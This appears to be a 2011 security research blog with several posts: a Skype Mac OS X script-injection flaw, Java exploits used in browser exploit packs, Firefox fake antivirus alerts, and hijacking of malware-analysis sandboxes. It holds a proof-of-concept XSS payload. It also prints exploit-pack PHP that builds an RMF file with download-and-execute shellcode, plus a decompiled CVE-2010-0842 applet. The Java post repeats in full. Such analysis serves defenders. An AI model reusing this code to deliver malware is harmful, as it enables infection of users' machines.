An Official Malware Research Blog of SecNiche Security Labs. Analysis, straight from the hidden and underground.
Tuesday, May 24, 2011
Friday, May 20, 2011
HackInTheBox AMS - Spying on SpyEye
We presented a talk regarding our research on SpyEye at HackInTheBox security conference. Thanks to Rohit for all his support and working with me on this research.
You can fetch the presentation from HackInTheBox Security Conference Website.
You can fetch the presentation from HackInTheBox Security Conference Website.
Tuesday, May 10, 2011
DoD CrossTalk - Browser UI Design Flaws
We have just published "Browser UI Interface Design Flaws" paper in Department of Defense CrossTalk Journal. Have a nice read.
Saturday, May 7, 2011
Skype IM (MAC OS X) - Is this the 0day ?
Recently, we have came across about the news on SKYPE 0 DAY that results in remote exploitation on MAC OS. However, we have also discovered the same pattern of vulnerability in Skype two months ago. Due to testing reasons, we were not indulged in the process of reporting it to vendor because we were looking at the malware paradigm related to this vulnerability(whether it can be exploited to download malware in MAC OSX).
Firstly, we are not sure whether the researchers are talking about the same vulnerability. This is because we have seen the news but the vulnerability details are missing everywhere. So our team thought to take a step in this direction. We are presenting the details of the vulnerability that we discovered in Skype running over MAC OS.
Discussion:
JavaScript is used extensively in all web related platforms. Skype application on MAC OS uses JavaScript too (most of the chatting client uses that, so not a big deal). This vulnerability does not impact the Skype running over windows and Linux. Skype fails to instantiate between the payloads that are sent as hyperlinks in the chat window. Only the legitimate users in the client list of victim can exploit it. The attacker only requires a definitive payload to exploit this issue. Basically, we call it as a Skype Remote Scripting (Injection).
Working:
In order to trigger this vulnerability, you need to find a vulnerable website that can be used as an agent to send our payload. For example: attacker can use third party vulnerable website to trigger scripting injection in Skype (MAC OS). Generally, certain truth prevails as follows
1. If an attacker sends a remote script payload as [script]alert(document.location);[script];skype filters this injection on chat engine which is quite normal. We have used square brackets (for representation) but for real injections one has to use angle brackets as XSS payloads.
2. Skype(MAC OS) fails to filter the injection in which payload is sent as a part of third part vulnerable website hyperlink as follows
http://www.vulnerablewebsite.com/index.php?url=[script]alert(document.location);[script]
A = http://www.vulnerablewebsite.com/index.php?url=
B = [script]alert(document.location);[script]
Skype fails to treat it as one hyperlink as (A+B). As a result, B part executes in the context of Skype(MAC OS) thereby resulting in remote scripting in the skype.
3. Attacker can use DOM injections to write arbitrary content in the chat window. There can be advanced variations of it.
4. We know MAC runs applications with extensions .app, it is possible to download malicious applications through skype. One can also trigger Safari automatically using DOM calls such as "window.open".
5. This vulnerability does not require any user interaction and runs payload directly. One has to be careful because it can execute content in both chat windows if an attacker and victim is using Skype (MAC OS). Attacker can use Skype on Windows and Linux in order to execute this attack.
Some of the POC's are presented in the below mentioned snapshots which supports the execution of this vulnerability.
Injection 1:
Injection 2:
Injection3:
This is really devastating from security point of view. All the versions before 5.1.0.922 are vulnerable. However, we still think the variation of this type of issues are possible and vulnerable versions can be exploited differently. Since it is executing scripts , we can say that this vulnerability can be used in worm infections.
Is this the 0day Skype Bug? Let see what the other researchers release.
Wednesday, May 4, 2011
Finest 5 - Java Exploits on Fire
Since the origin of browser exploit packs, we have noticed a serious change in the effectiveness of exploitation ratio due to origin of critical vulnerabilities. However, we have noticed and observed recently about the explicit use of Java vulnerabilities by Browser Exploit Packs (BEP's). Java has become the most prominent exploitation vector now a days. BEP's such as BlackHole and Phoenix are using Java exploits explicitly for triggering infections. Consequentially, the highest infection rate is an outcome of these Java exploits.
Java being platform independent is the preferred choice of attackers in order to attack victim machines. The Java exploits that are on fire are as follows
1. Sun Java Runtime Environment Trusted Methods Chaining Remote Code Execution Vulnerability (CVE-2010-0840)
2. Java JRE MixerSequencer Invalid Array Index Remote Code Execution Vulnerability
(CVE-2010-0842) | Java JMF MIDI
3. Java Unspecified vulnerability in the Java Deployment Toolkit component in Oracle Java SE (CVE-2010-0886)
4. Sun Java Runtime RMIConnectionImpl Privileged Context Remote Code Execution Vulnerability (CVE-2010-0094) | Java RMI
5. Java argument injection vulnerability in the URI handler in Java NPAPI plugin (CVE-2010-1423)
The latest addition to Java exploit is CVE-2010-4452 which presents a flaw exists within the findClass method of the sun.plugin2.applet.Applet2ClassLoader class.
Serving these exploits are quite easy by simply pushing Jar file as follows
[object id="java_obj" classid="clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA" width="0" height="0"]
[PARAM name="launchjnlp" value="1"]
[PARAM name="docbase" value="]
[/object]
[embed type="application/x-java-applet" width="0" height="0" launchjnlp="1" docbase="';
include '../config.php';
include '../include/shellcode.php';
$shellcode = shellcode_dl_exec ($config_url . '/drop.php?e=Java-2010-0842');
$rmf = 'IREZ' . 'SONGmSËm' . ' ' . '' . '' . 'ITLŸ±µ
~ûpœ†þ°5' . '“â^Þ÷' . 'ÿ' . '' . '8ÿ ÉPQRSVW' . $shellcode;
header ('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
header ('Cache-Control: no-cache');
header ('Pragma: no-cache');
header ('Accept-Ranges: bytes');
header ('Content-Length: ' . strlen ($rmf) . '');
header ('Content-Disposition: inline; filename=midi20100842.rmf');
header ('');
header ('Content-Type: application/x-msdownload');
So we cannot ignore the easiness of spreading malware by exploiting Java vulnerabilities. For example consider the below stated exploit trigger
include_once 'config.php';
echo ' [Applet Code="ToolsDemo.class" archive="';
echo $config_url . '/exploits/Java-2010-0842.jar';
echo '" width="0" Height="1"]
[PARAM NAME="URL" VALUETYPE="ref" VALUE="';
echo $config_url . '/exploits/Java-2010-0842Helper.php';
[/applet]';
On decompiling Java-2010-0842.jar, we get
import java.applet.Applet;
import java.io.*;
import javax.sound.midi.*;
public class ToolsDemo extends Applet
{
public ToolsDemo(){}
public void init()
{
String s = getParameter("URL");
try
{
InputStream inputstream = getClass().getResourceAsStream(s);
ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream();
byte abyte0[] = new byte[1024];
int i;
while((i = inputstream.read(abyte0)) != -1)
bytearrayoutputstream.write(abyte0, 0, i);
ByteArrayInputStream bytearrayinputstream = new ByteArrayInputStream(bytearrayoutputstream.toByteArray());
ToolsDemoSubClass toolsdemosubclass = new ToolsDemoSubClass();
javax.sound.midi.MidiDevice.Info ainfo[] = MidiSystem.getMidiDeviceInfo();
MidiDevice mididevice = MidiSystem.getMidiDevice(ainfo[0]);
Sequencer sequencer = null;
sequencer = (Sequencer)mididevice;
sequencer.open();
sequencer.setSequence(bytearrayinputstream);
sequencer.addControllerEventListener(toolsdemosubclass, new int[] {
0
});
sequencer.start();
}
catch(Exception exception) { }
}
public String getAppletInfo(){return "Tools Demo";}
}
Something is really on fire :)
Java being platform independent is the preferred choice of attackers in order to attack victim machines. The Java exploits that are on fire are as follows
1. Sun Java Runtime Environment Trusted Methods Chaining Remote Code Execution Vulnerability (CVE-2010-0840)
2. Java JRE MixerSequencer Invalid Array Index Remote Code Execution Vulnerability
(CVE-2010-0842) | Java JMF MIDI
3. Java Unspecified vulnerability in the Java Deployment Toolkit component in Oracle Java SE (CVE-2010-0886)
4. Sun Java Runtime RMIConnectionImpl Privileged Context Remote Code Execution Vulnerability (CVE-2010-0094) | Java RMI
5. Java argument injection vulnerability in the URI handler in Java NPAPI plugin (CVE-2010-1423)
The latest addition to Java exploit is CVE-2010-4452 which presents a flaw exists within the findClass method of the sun.plugin2.applet.Applet2ClassLoader class.
Serving these exploits are quite easy by simply pushing Jar file as follows
[object id="java_obj" classid="clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA" width="0" height="0"]
[PARAM name="launchjnlp" value="1"]
[PARAM name="docbase" value="]
[/object]
[embed type="application/x-java-applet" width="0" height="0" launchjnlp="1" docbase="';
include '../config.php';
include '../include/shellcode.php';
$shellcode = shellcode_dl_exec ($config_url . '/drop.php?e=Java-2010-0842');
$rmf = 'IREZ' . 'SONGmSËm' . ' ' . '' . '' . 'ITLŸ±µ
~ûpœ†þ°5' . '“â^Þ÷' . 'ÿ' . '' . '8ÿ ÉPQRSVW' . $shellcode;
header ('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
header ('Cache-Control: no-cache');
header ('Pragma: no-cache');
header ('Accept-Ranges: bytes');
header ('Content-Length: ' . strlen ($rmf) . '');
header ('Content-Disposition: inline; filename=midi20100842.rmf');
header ('');
header ('Content-Type: application/x-msdownload');
So we cannot ignore the easiness of spreading malware by exploiting Java vulnerabilities. For example consider the below stated exploit trigger
include_once 'config.php';
echo ' [Applet Code="ToolsDemo.class" archive="';
echo $config_url . '/exploits/Java-2010-0842.jar';
echo '" width="0" Height="1"]
[PARAM NAME="URL" VALUETYPE="ref" VALUE="';
echo $config_url . '/exploits/Java-2010-0842Helper.php';
[/applet]';
On decompiling Java-2010-0842.jar, we get
import java.applet.Applet;
import java.io.*;
import javax.sound.midi.*;
public class ToolsDemo extends Applet
{
public ToolsDemo(){}
public void init()
{
String s = getParameter("URL");
try
{
InputStream inputstream = getClass().getResourceAsStream(s);
ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream();
byte abyte0[] = new byte[1024];
int i;
while((i = inputstream.read(abyte0)) != -1)
bytearrayoutputstream.write(abyte0, 0, i);
ByteArrayInputStream bytearrayinputstream = new ByteArrayInputStream(bytearrayoutputstream.toByteArray());
ToolsDemoSubClass toolsdemosubclass = new ToolsDemoSubClass();
javax.sound.midi.MidiDevice.Info ainfo[] = MidiSystem.getMidiDeviceInfo();
MidiDevice mididevice = MidiSystem.getMidiDevice(ainfo[0]);
Sequencer sequencer = null;
sequencer = (Sequencer)mididevice;
sequencer.open();
sequencer.setSequence(bytearrayinputstream);
sequencer.addControllerEventListener(toolsdemosubclass, new int[] {
0
});
sequencer.start();
}
catch(Exception exception) { }
}
public String getAppletInfo(){return "Tools Demo";}
}
Something is really on fire :)
Tuesday, May 3, 2011
Firefox Fake AV Alerts - Malware Trigger
Malware writers are opting aggressive techniques to infect users with malicious programs. Browsers are always been the prime exploitation paradigm. What else could be better than Anti Virus Alerts in browsers? Recent trend encompasses manipulation of Firefox(supporting other browsers too) in order to trigger malicious AV alerts there by forcing user to download malicious executable. For security researchers, detecting these alerts are not that hard task. However, normal users find themselves in havoc from the fear of being infected when they face these malicious alerts. Infact, this process exploits the ignorance or one can say fear of users by social engineering tricks. In order to remove malware from system (fake alert notifications) users intentionally install malicious program on their machines.
Generally, these alerts are not browser specific rather browser independent. It is also possible that these alerts trigger only when User Agent Based Fingerprinting (USBF) is done . There are many scenarios. The below presented snapshot shows how Firefox is manipulated
On successful scans, it alerts lot of security issues for the presence of trojans, backdoors and rootkits etc. Despite of the hilarious fact that, your system level AV engine stays calm. Well, visualization of threats have its own implication. On completion of scans, these alerts force users to install following file (specific for domain we are analyzing)
Further, Mozilla inbuilt bad site reporting service works collectively with stopbadware.org. Firefox uses redirection to redirect user to the legitimate domain (stopbadware.org) on ignoring the warning. That is something we all know.
[REQUEST]
GET /?hl=en-US&url=http%3A%2F%2Fupdate82.sashrod.ce.ms%2Findex.php%3FQ1Xhk9SJbYJGPXpjM%2
FtL5is7E974ZjcioT7yKQchpNjVUC%2B1hEwpaVGuq1zgdVqksMShxC9dHBs
2rpwYqQjCVkTeZbDJDe1pKU0ChURY HTTP/1.1
Host en-us.malware-error.mozilla.com
User-Agent Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17 ( .NET CLR 3.5.30729; .NET4.0C)
Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language en-us,en;q=0.5
Accept-Encoding gzip,deflate
Accept-Charset ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive 115
DNT 1
Connection keep-alive
[RESPONSE]
(Status-Line) HTTP/1.1 302 Found
Date Tue, 03 May 2011 22:28:08 GMT
Server Apache
X-Backend-Server pm-web02
Location http://www.stopbadware.org/firefox?hl=en-US&
url=http%3A%2%2Fupdate82.sashrod.ce.ms%2Findex.php%3FQ1Xhk9SJbYJGP
XpjM%2FtL5is7E974ZjcioT7yKQchpNjVUC%2B1hEwpaVGuq1zgdVqksMS
hxC9dHBs2rpwYqQjCVkTeZbDJDe1pKU0ChURY
Content-Length 394
Keep-Alive timeout=20, max=996
Connection Keep-Alive
Content-Type text/html; charset=iso-8859-1
This discussion clearly indicates the fact that how badly browsers are getting manipulated. Consequentially, browsers are always at stake so do users despite of our protection efforts.
Monday, May 2, 2011
Reverse Hijacking Web AV Engines
Web anti virus engines are used explicitly to perform behavioral analysis on the active malware. Is it possible for us to run some controlled binary in order to trace all the information of cloud infrastructure of virtual machines that collaboratively perform analysis of malicious executables? We have proved that in the past it is possible to hijack (information extraction) from the hidden servers in the cloud used for malware analysis.
The technique discussed in the white-paper can be used in different scenarios in order to trick internal vmware servers to steal sensitive information and there by attacking in return. Goodwill Hunting :)
Reverse hacking proves beneficial in many scenarios.
The technique discussed in the white-paper can be used in different scenarios in order to trick internal vmware servers to steal sensitive information and there by attacking in return. Goodwill Hunting :)
Reverse hacking proves beneficial in many scenarios.
Subscribe to:
Posts (Atom)